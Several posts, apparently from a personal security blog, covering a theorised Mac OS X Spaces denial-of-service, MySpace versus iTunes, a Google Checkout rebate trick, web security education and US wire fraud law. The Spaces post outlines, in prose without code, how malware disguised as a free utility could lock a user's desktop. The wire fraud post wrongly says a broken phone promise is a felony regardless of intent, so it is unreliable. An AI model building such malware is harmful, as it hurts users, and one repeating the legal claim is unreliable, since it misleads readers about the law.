I got to scratching my head when playing with this feature realizing it’s potential flaw is so simple, its almost idiotic and so far as I can ascertain, overlooked or ignored. The premise of this theory is that Spaces is a means of virtualization of the desktop, wherein users are able to have multiple desktops hosting multiple applications in each window without the need to cram everything you’re using onto one screen by itself at any given time. On one desktop or Space, I could have Adobe Photoshop CS3+ running, iChat on another and the next I could be using Microsoft Entourage to check my e-mail. Three separate Spaces have expanded my desktop now from 1280×1024 to 1280×1024x3 (up to 16 Spaces are allowable according to Apple). The possibilities of efficiency with this are endless, however, there is a problem.

Spaces inherently has a function to where the user is able to switch between Spaces based on a set of key combinations such as how I picked the Command and Arrow keys to swap between my Spaces - in succession, I can hold down the Command+Right Arrow and swap between all three Spaces, one right after the other - a behavior I stumbled on though has alarmed me. Spaces has a hook in place by default and with no apparent trigger to disable it from the Preference Pane, where if I receive a instant message via iChat, I will switch from one Space to the next Space that hosts that iChat application.

So, although I provide no proof of concept at this time(if someone would like to write one I will be happy to post it here for review), there is a underrated Denial of Service to the user interface itself available here for exploitation by any software engineer ept enough. I imagine the scenario to playout like this:

1. A exploit is installed unwittingly by the user who will undoubtedly have to enter the Administrator password to install the application on OSX - providing this hasn’t been disabled by either the user or the software itself.
2. The exploit is either run by the user or is loaded as a service, possibly on boot from …/com.apple.boot.plist or something of a similar nature.
3. The user logs into their desktop profile.
4. The exploit, sensing the login, triggers the involuntary hook that iChat and other numerous applications use to swap between desktops, one after the other, consecutively where “Force Quit” is useless to stop it since it does not load atop the desktops themselves, but announces itself within the Space windows.
5. The involuntary action continues until the user reboots the system, only to encounter the same issue when they login once again.

Anyone can test the basics of this scenario if they have an Apple or OSX on x86 hardware by logging in, setting up Spaces via the System Preferences and it’s associated Preference Pane and committing to the keys chosen multiple times - Spaces is apparently resource intensive enough to continue after you’ve stopped hitting keys, executing each successfully, but semi-involuntarily. This issue seems to be adding credit to the idea that perhaps Spaces is broken as Dave Dribin lends credit to in his weblog entry.

PROS: The unfortunate pro is that because Apple has concentrated on making the Mac as user-friendly to even the lowest layman (it just works), a large segment of it’s userbase would be effected because they are naive enough to go along with a professional looking installation - perhaps this exploit disguised as a free product to optimize their already fast Apple in the first place. Windows users have fallen prey to this very phenomenon, should we really assume Apple’s users are much different?

CONS: The cons of such a DoS would be that it isn’t effective against users who do not choose to use Spaces (it isn’t an option loaded by default) and there are several actions the user would need to take or the exploit author would have to change on default installation of the rogue application before the DoS would take effect. Additionally, the exploit author might have to somehow hinder the “F8″ enabling/disabling function for Spaces, which could be accomplished with minimal degree of effort.

The remaining question posed by a viewer, is whether or not this behaviour could survive the Single-User mode via whatever framework set it in motion. That remains to be seen.

(NOTE: Updated to reflect the correct number of iPods sold by Apple, to also include iPhones which are capable of playing music, according to their report released in late April.)

Upon doing some quick research on the scope of MySpace’s endeavour, I came across some interesting analysis. MySpace claims it has over 100 million users - that doesn’t necessarily mean that they all convene over MySpace Music, but that does lend credit to the idea that they have a sufficient userbase to challenge Apple’s iTunes on…. if it were true. ForeverGeek produced a detailed, albeit unofficial, breakdown of MySpace’s inevitably flawed and potentially deceitful claim/myth in their article “Debunking the MySpace Myth of 100 Million Users” (reference: http://forevergeek.com/articles/debunking_the_myspace_myth_of_100_million_users.php“), disavowing the validity of the idea that they’ve got a larger share than in all actuality. The numbers computed actually add up to a lofty 43 million persons (not counting multiple accounts per person), give or take.

Apple, however, obviously gathers their user data in realtime. On April 3, 2008 it announced in a press release that it has reached over 50 million users, which might inveritably only be corrected for accounts inactive if it hasn’t been already (reference: http://www.apple.com/pr/library/2008/04/03itunes.html). Supporting that service number, it is widely acknowledged that the innovator has sold over 110 million iPod units (as of September 2007) worldwide since it’s inception. Although the market is being saturated by them, it is predicted that Apple will still boast up to approximately 10.5 million 10,644,000 iPods and 1,703,000 iPhones were sold for the quarter. A number like that must include fallover/rollover from previous models, but we can definitely expect that a large percentage of that are new owners/users to the iPod/iTunes marriage such as is mentioned in Tom Krazik’s smart article “Apple’s spring lacks pizazz but should be solid” (reference: http://www.news.com/8301-13579_3-9927415-37.html?tag=nefd.lede)

Apple’s success with this marriage is due to their productive symbiosis. Software for hardware for consumers who demand a intuitive user experience to access music for recording industry label’s profit bottomline for artists who in need a online software solution to distribute their content to a mass audience who has hardware to listen… it is it’s own ecosystem and with any good ecosystem there are natural deterrents engrained in it in an attempt to prevent anything from upsetting that ecosystem. MySpace had better put on it’s boots and dig in, because Apple isn’t going to let territory go without a fight. A D5, Steve Jobs on stage established that for years they were very poor at partnering with other companies or entities to achieve goals. In no certain words, he indicated that is no longer the case and we can be sure that Apple’s talent is sourcing the next generation of entertainment distribution somewhere… As I said in my last article, I’d put my bet on the rival social networking site Facebook, but that remains to be seen. If MySpace expects to gain ANY ground in their fight for dominance, they’d better target more than one playback device, partner with both big labels and indie labels to distribute and it would behoove them to develop their own lossless playback format or enable support for Apple’s own. They’ll have to significantly undercut Apple’s rates, which will hurt either their target audience coverage or their pocketbook by taking the hit and now they’ll have to dance for the movie studios since iTunes has successfully moved into movie rental/ownership through their service. SnoCap is riding the coattails of MySpace, garnering the attention of their target audience to boost a profit… it a temporary solution to a non-existent problem. MySpace will need to wake up from this relationship in order to gain the margins in their favor.

On top of the hype is the confusion or ignorance to MySpace’s ‘innovations‘ in the field of music. Melissa Chang (The Standard) seems to have hastily proclaimed that, “MySpace was the first such site to empower musicians, making it simple (and free) for any band or artist to create a Web presence complete with streaming music, an upcoming tour schedule, and a way to enlist “fans”… (reference: http://www.thestandard.com/news/2008/04/04/how-myspace-music-could-beat-itunes)”. Perhaps Melissa has seemingly forgetten such iconic sites like MP3.com, who developed one of the original, plausible models of online music distribution on the Internet without cost to the user?

I find this evolving situation all so captivating and I look forward to seeing where this challenge propels the industry and associated consumer market. Due to the fairly convincing facts, Apple stands to lose virtually nothing and MySpace stands to jump on a failing bandwagon to overtake the godfather of music services via the Cloud. The reign won’t be permanent, I am sure of that we can all agree - this effort, however, will not spell the end.

It partly boils down to convenience in the user experience. That is, the ten-foot viewing experience in the living room, the 3-5 foot interactive experience in the office and the in-hand experience that you’ll inevitably want when going for that afternoon jog (I know I do). MySpace, without a device, cannot challenge Apple’s iTunes in their sandbox. This obviously isn’t the only factor, as Microsoft’s Zune has only captured a slight market share against Apple’s iPod series despite the significant roll-out of the media device.

The recent shake-up in the format war between HD-DVD and Blu-Ray discs where HD-DVD conceded defeat provides credit to the idea that big money from big backers won’t necessarily buy you big wins. MySpace Music’s big three music companies providing backing are counting on this very same flawed philosophy though in an blatant attempt in increase their profit intake for their portfolios online, something that is currently regulated effectively by Apple and their iTunes software + licensing agreements.

The strategy they take would have to be one of low-cut pricing, however, even Amazon’s model hasn’t taken hold and they’ve posted no profits (not necessarily a surprise with Amazon since it took them several years to get anywhere beyond breaking even). Offering cost-effective or feeless downloads to their user community could see them gain large adoption… but that still leaves them on the social networking cutting room floor. MySpace’s interface IS NOT intuitive enough to deal with their own social networking customers and advertising partners. It is an amalgamation of horrid code and poorly defined front-end design that MUST be reengineered to effectively entice the loyalists of Apple, pampered as they may be.

MySpace is a unique case and possibly a perfect platform for recording industry leaders to force Apple’s hand, something that half a dozen other companies including Sony and Microsoft have not even come close to doing. So MySpace, a strictly speculative software company, a fledgling in any marketplace outside of social networking and who is quickly losing market share to better web applications as a service providers like Facebook, is going to try to duke it out with Apple, a hardware and software applications integration pioneer, on their turf? It just isn’t going to happen.

Speaking of Facebook, I can’t wait until iTunes somehow integrates with it since Apple and Facebook have been in bed for almost a year, maybe more (as can be seen in a recent podcast regarding the iPhone software roadmap and the release of their open SDK). That is strictly speculation on my part, but now both companies have a reason to want MySpace in the gutter and that is a powerful combination to tango with.

As mentioned before, there is one usergroup that will benefit from any challenge to Apple… that is the Apple users, such as myself (yes, after over a decade of lauding the PC I’ve been sincerely sold on Steve Job’s vision and I just don’t care to look back), themselves. Bring it on MySpace, you’re only making my stock go up and my user-experience richer.

No, as popular as it might be to believe, we were not compromised. We did, however, fail prey to the insidious forces of data corruption.

It seems we ran into a small problem with our current hosting platform provider, graciously provided by CodeCircus, Ltd. (reference: http://www.codecircus.co.uk) out of the United Kingdom. Our specific server was getting a slight software/build overhaul by one of their System Engineers, when somehow inadvertently the site itself was wiped by some odd glitch in the backup/transfer process - this slightly corrupted the database tables and skewed the permissions of the directory and/or sandbox(jail) we run in (we’re still trying to piece that one together).

So to say, we’ve been down for about a month after performing an indepth forensic analysis of the logs, traffic and services. You may notice that the site now runs slightly faster and we’re operating on the fringe of bleeding edge w/ WordPress’ most current offering(s).

We have an interface change coming soon, something we’ve been working on off-and-on for a few months in-between our daily moments in life, career and family.

We want to thank you for being such soldiers and awaiting our official return and reclamation in the publishing circus known as the Internet. Keep reading!

 

 

As a branch-community, WebAppSec has done a piss-poor job in educating developer masses and instead of concentrating on measures in reaction, we should have been concentrating on measures in foundation. What I mean by this, and harkening back to a segment in one of my previous articles (here), there has been no residual accountability in our community or the industry on their lacking in education of the end-user on their avenues of protection in production. The industry throws fifteen different security products at them and through fear-marketing, tell them everything is at stake if they don’t purchase our product - something which may or may not be true depending on circumstance. The consumer doesn’t necessarily NEED to understand the technologies being employed in protecting their assets after-the-fact, however, what they do need is education in at least understanding their web-application from the security standpoint at origin. The only viable answer to the security question is strictly in the hands of the author of the application itself at the time of production. This weblog itself @ theReformed, running WordPress, is inherently vulnerable to any number of published or unpublished vulnerabilties because it wasn’t designed as a secure application, but as a publically-accessible, publishing platform (say that five times fast).

Sure, there exists any number of disclosure open-policies (RFPolicy v2.0), but how many people in the webappsec community are adherring to these guidelines? In that context, we’ve therefore allowed the industry’s constituents to regulate themselves and the avenue of open-source technology, development and information has cut our own throats. Of course, as things roll down hill, that massacre has been passed on to the unsuspecting consumer, one who not by choice is inherently ignorant to the threats against their personal or business web-applications.

FORWARD NOTE: Regarding my next few points, as most of you know I respect Robert and his opinion’s very much having known him for many years now when we emerged from a different ethical scene - even invited him to my wedding :D. I believe he understands that I do my best to stay unbiased and objective when I look at a concept. Most of his opinions and statements in this interview, I agreed with - I just happen to have a different perspective than his on a few specific points.

Recently, I was reading Net-Security.org’s INSECURE MAG #14 (here) and came across an interview with my friend Robert Hansen (RSnake) that was discussing his expertise, impact and opinions on WebAppSec, wherein he stated something that I took a step back and had to think about, “I know lots of people think that stupid users are to blame for getting hacked, but I totally disagree with that (I like to think I have a pretty modern view of security in this regard) ….. They’ve followed every piece of advice that we as the security community have programatically offered them. The answer, unfortunately is that we, as a security community, have done a miserable job in giving consumers the correct tools to secure themselves.”

This is where Robert and I would most likely differ in opinion - I believe we, as the security community, have performed poorly in defining a relative standard of secure code practice for our associated developer community. It shouldn’t entirely be the consumer’s responsibility to police their Internet application, because the basic design, language, string, library or algorithm is inherently flawed before they ever utilize it (granted not always the case, but plausible) - there are only a handful of relevant checks and balances to keeping someone from writing a vulnerable application inside tools like Microsoft Visual Studio or even rich-media development tools like Adobe Flash Studio. The community should be assessing and mitigating the threat beforehand, establishing an instructional programming alternative for our developer community, decreasing the likelihood of poorly implemented, insecure products ever making it to market before we have to come up with workarounds and patches in the first place - its a lofty and far-flung idea probably to never happen, I’ll concede that.

I might also not agree, respectfully, when he says, “Let’s take an example of a user who logs into a Windows machine for the first time. It complains that there is no AV or Firewall. So they turn on Windows firewall or install another one, and the AV of their choice. They patch up because Windows yells at them. Does that make them secure?“, in the sense that the consumer IS partially to blame in many cases by failing to head these warnings.

Using an unnamed associate as an example (accomplished his professional career, but certainly technology-disabled - though not illiterate), he strictly looks for compliance (as Robert pointed towards consumers earlier in the interview) with the necessity of securing his data, the method of handling and with no deliberate intent to protect it other than what the industry has thrown at him as a solution to do so, spending countless dollars on suites of software that are ineffective. Unfortunately, those solutions don’t fix the problem and software nagware only serves to irritate him rather than motivate him to further correct the problem. This is self-imposed ignorance on the part of the consumer, wherein all the, and I use the term loosely, ‘solutions‘ have been presented, but out of fear, interest or lack of comprehension of it’s necessity / role the consumer doesn’t implement it. Why wouldn’t they be to blame, depending on circumstantial eligibility?

What advocacy group has this community developed that really speaks to the consumer on their level, leveraging the appropriate solutions / alternatives to their counterparts? OWASP is about as close as it gets to this definition that I’ve seen, a quite commendable effort by volunteers, but still lacking in the ability to connect with the consumer at the lowest tier, the market driving force that creates the demand - a demand that shouldn’t exist or should at least be transparent in some form. There is an old addage that the people and the politicians don’t speak the same language; the same can be said for programmers and end-users, they just don’t speak the same language, which is why IBM hires/employs a marketing firm or internal professionals to create it’s commercials, awareness ads and advertisements. If it was left up to the programmer’s the commercial would hypothetically be in all scrolling binary, with a black screen, red letters and Nine-Inch-Nails playing in the background. Probably not as bad as that, but you get the idea.

Additionally, the playing field has grown much too large and the consumer audience’s choices factor. Fields of products are making claims to patch mistakes, prevent authentication issues, reduce buffer exploitation and secure this / that. Yes, we’ve most certainly stepped to the plate in providing tools - however, how appropriate, efficient or relevant are they to the commonplace pitfalls programmers encounter? They number in the hundreds now commercial or otherwise, becoming exhaustive for even a entire team of professionals to completely evaluate for their uses. It would also seem, that the most effective tools have a history of having the most ineffective marketing campaigns, suffering poor adoption rates throughout the consumer community while some of the most ridiculous software packages have made their mark (and buck) because they know how to speak to the market. So there is a problem of communication and associating or relating the problem at hand to the consumer.

Rounding this back out to a final point, we must depend on our software architects/authors/programmers/magicians to apply the proper precautions when developing their next application. We can’t expect them to do this, without lobbying them with the appropriate instructions, tools and content to do so. We can’t assail our consumer base with the products to fix the things these individuals have failed to mitigate initially without realizing we could have resolved the situation from the ground-up and then blame our consumers for failing to act on our recommendations when we don’t provide some glimmer of hope that we’re working to improve their software’s security before it even hits the market -OR- we saturate them with so many warnings that they stop listening (ala ‘the boy who cried wolf’).

Searching through Google's APIs, I found one that is called Google Checkout - I thought it was a little out of Google's arena to concentrate on software that was so simple when their time seems to be best spent on sitting on their hands regarding privacy vulnerabilities in their forest of domains ( http://www.thereformed.org/2007/08/21/google-xss-destruction-of-mankind/ ), but then I began to see the implications of how it could propel them into a financial go-between scenario, incognito, and concede that down the road this will be quite beneficial to them.

So, I ventured off into the Internet to see how much penetration this API was getting, whether or not is was plausible for a project I have upcoming to incorporate and came across a advantageous find unexpectedly. Google Checkout has been offering an instantaneous, free $10.00 rebate with purchases made through sites that incorporate it's API. Because of this, websites offering products in that range could essentially be acquired free or at low cost to the consumer. A good example of this is Buy.com and I will get into this shortly.

Granted, doing a little more searching I realized that apparently I am not the only one that happened upon this, in fact, I venture that at least a dozen posts have been published on the Web so far. At the risk of being redundant, however, knowing the vast audience our site is being visited by, I figured if anything we could pass along this smart little tidbit for a larger dissemination than others have gotten previously.

So, without further delay, let me get to the bits. Items required to successfully complete this transactions: (1) A URL with a product that is $10.00 (if you're looking to get something for free). (2) An account with Google, most likely through GMail - it is suggested to be logged in to avoid having to create a new account or to register. (3) Approximately 3 minutes of time to enter your information for shipping, etc. (4) The basic human ability to read and follow the instructions, correctly. 

Our target is going to be Kingston's 1Gb USB 2.0 Flash Thumbdrive located here @ http://www.buy.com/prod/kingston-1gb-data-traveler-usb-2-0-flash-drive/q/loc/101/202743517.html . This drive is on sale at the Buy.com price of $10.00, right? NO! It is on sale at the Google Checkout price of FREE.

Let me explain. Buy.com sales it for it's reduced price, but the first usage of Google Checkout you use takes money off the top of the purchase. In this case, the two cancel eachother out because the pricing is obviously the same.

"Wait! Doesn't Buy.com charge for shipping?" Yes and no, in this case, the latter. It will take between 7 to 9 days for your item to be arrive, but if you do pick that delayed routing it won't cost you a dime as the associated taxes/costs for shipping aren't applicable since they offer it for free.

Add the Thumbdrive to your Cart and select the Google checkout option. Go through the normal roll of adding your details as requested by the application, setup your address and voila! You should see a screen totalling $0.00 and a friendly reminder telling you that your order has been placed and is being shipping accordingly.

So, get out there and get to it. Happy shopping :) 

***UPDATE***

Further searching reveiled another article posted which offers a significant listing of websites participating in this 'promotion' @ http://www.downloadsquad.com/2007/01/19/10-free-from-google-checkout-which-stores-are-participating/ . Check it out and drop him a comment thanking him for the consolidation of this list. 

I can imagine they get a lot of pranksters asking questions like "how can I steal my mom's credit card". However I posed a rather specific question to them (it was actually a problem I was having at work and was unsure of how to fix it).

My search was for: "Format or relabel drive in OpenBoot for Solaris"

I signed up for an account, started my "search with a guide" and the following conversation took place: 

Status: Connecting …Status: Looking for a guide …
Looking: …

Status: Marilisa has connected to help you with your search on format or relabel drive in OpenBoot for Solaris. Please wait while your guide searches for your results.

Marilisa: Welcome to ChaCha!

You: hello.

Marilisa: hi! can you explain thissearch so I can clarify it?

Marilisa: chacha thinks this is written in Italian! but I think this refers to a computer issue?

You: I have a SCSI drive that had an old BSD installation on it, Solaris won't recognise it as a Sun disk so I am trying to either format the disk or relabel it using OpenBoot on a SPARC machine.

You: yes it's a computer issue
You: I just need to locate the commands.

Marilisa: ok that helps; let's see
Marilisa: several links are pdf.

…. two minutes later - she posted a link…

http://www.theconsultant.net/archives/category/software/solaris/ 

You: that link you posted is a generic Solaris link. Solaris is a UNIX operating system.

You: I need a specific list of disk commands for OpenBoot.

… another two minutes go by

Marilisa: I am trying to send the pdf links but chacha doesn't let me.

You: right.

… another minute 

You: you know what I think I might just hit google myself.

After looking on Google for about 25 seconds I found this link to a forum post which answered my question perfectly.

http://forum.java.sun.com/thread.jspa?threadID=5082643&start=0&tstart=0 

So as you can see from this, I most certainly did not get a more specific result. No offense to Marilisa, she was probably confused and had no idea what I was talking about. But the point I am making is that back in the original Web 1.0 boom we had all kinds of stupid and daft ideas popping up that were utterly useless and could never hope to make a penny in revenue. As the investors were pouring in the millions, they were falling straight back out the bottom and tumbling down the drain. This ChaCha service reeks of those wild and reckless Boo.Com days.

I honestly think that this time around there is a little more sense floating in investors and VC/Angel Investors, however we are getting dangerously close to the champagne-party-come-private-jet fest that crippled the industry last time round. It seems that people are panic building products that suck, just so they may be in with a chance of being bought out by Google or Yahoo! for $5billion in 3 months.Inventing solutions for problems that don't exist - and burning through billions whilst doing so. 

Looks like the 2.0 bubble is on the cusp of yet another pop.

Let's party like its 1999. 

(note: Please consider that I am not an attorney or paralegal and my perspective is based off the understanding of the US Code through review of legislation, case studies and general commentary - if you are a legal professional, please feel free to post your perspective on this entry in the Comments below as I would be intrigued to know your opinions on this)

Let's refine this situation a little: Simple people can easily become simple felons. Searching through the web on some wire fraud information, I eventually landed on Cornell University's Law School website where I came across this entry in the United States Code:

TITLE 18, PART I, CHAPTER 63, § 1343 - Fraud by wire, radio, or television

Whoever, having devised or intending to devise any scheme or artifice to defraud, or for obtaining money or property by means of false or fraudulent pretenses, representations, or promises, transmits or causes to be transmitted by means of wire, radio, or television communication in interstate or foreign commerce, any writings, signs, signals, pictures, or sounds for the purpose of executing such scheme or artifice, shall be fined under this title or imprisoned not more than 20 years, or both. If the violation affects a financial institution, such person shall be fined not more than $1,000,000 or imprisoned not more than 30 years, or both.

(source: http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001343—-000-.html)

"Ok fella, so what does this mean for me?", you're probably asking yourself as a US citizen or just an interested party. Glad you asked! Taken in context, this one entry applies directly to your everyday life. ANY communications of committment relayed by telephone, e-mail, radio, television or any other form of electronic broadcast that is produced through a physical medium identified in title is considered binding.

Example, say I owe my friend $20.00US he lent me for a purchase. My original intent is to pay him back. In person, I would relay that to him and with his acceptance of those terms the agreement would be finalized, maybe with a hand shake or just a verbal confirmation. I then  become incapable of follow through immediately or which we somehow reached an empass where the agreement is in question - on my defaulted/delayed payment the ramifications are very minimal other than harming the friend's perspective of my character and weakening the weight my 'word' carried with him or others.

Under normal circumstances, this is generally enforceable only as a 'gentleman's agreement' (reference: http://en.wikipedia.org/wiki/Gentlemen's_agreement), or a mutually agreed on set of terms between two cooperating parties -  although it should be noted that in some states such as Texas, verbal agreements are admissable in court as legally binding. The point of the gentleman's agreement is convenient, mutual, social-based committments to eachother, an act that we might commit on a daily basis - the underlying theme is honor.

However, when you include transmission of that agreement over wire, radio or television (although I am not sure why you would do the latter) (i.e. If I called him and let him know, "hey buddy, I am going to pay you back this week") and then I fail to follow through on my committment in the timeframe I've set, by the letter of the law I have just committed a felonious act which is punishable by up 20 years in prison, regardless of the intent.

Outside of the technology used to relay this, it also boils down to the definition of fraud which can vary by different states. "I'm not a defrauding anyone though, it just didn't happen as I expected!". Unfortunately, that isn't accurate. Although fraud is generally defined as an act of deception or an attempt of hoax, it can also be defined as failure to act or effect the provisions of a committment or contract between parties.

Because of these reasons, I would have unintentionally committed fraud through a device such as a cellphone perhaps and be subject to severe penalty in the court of law, because I didn't pay my friend back his $20.00Us according to the timeframe or terms agreed upon.

I'll acknowledge that it would be an extreme case to take to court for damages of non-payment for $20.00US, however, it provides sufficient example of how the current legislation doesn't make a proper determination or distinction between the circumstance and intent of the parties involved and the role of a medium and the usage thereof which they've communicated that through - a law meant to punish severe, criminal violators on a federal level now can be misused to harass normally law abiding citizens.

Wrapping up, just one more reason to be careful about what you say on the Internet, telephone or radio in this day and age. Because a committment you relay today, could come back to haunt you tommorrow. If you're going to give your word, stand by it.

This year Summercon returned to Atlanta so I made my first appearance in 7 years.  Among the things that made it worth going this year:

• A shoe being thrown during a presentation for no reason
• Billy Hoffman drinking 4 beers at once while giving a presentation
• Caleb Sima confused by the mayhem during his presentation
• redpantz directing traffic in Midtown Atlanta
• Seeing people I haven't seen in years

In case you hadn't figured it out yet.  Summercon is ultimately about the social side of the security industry.  We get together to have fun, talk a little business, and make new friends.  If you ever have the chance, please attend.  I had a great time.

Oh, and some people talked about some security stuff too. SPI Dynamics (HP), ISS (IBM), and others were represented.

NASDAQ 
Johnson & Johnson

Yes, these have been disclosed/reported to the hosts with adequate time allowed for acknowledgment. The NASDAQ one is quite intriguing since you can rewrite the site's html source.

When will programmers learn to write secure from day one?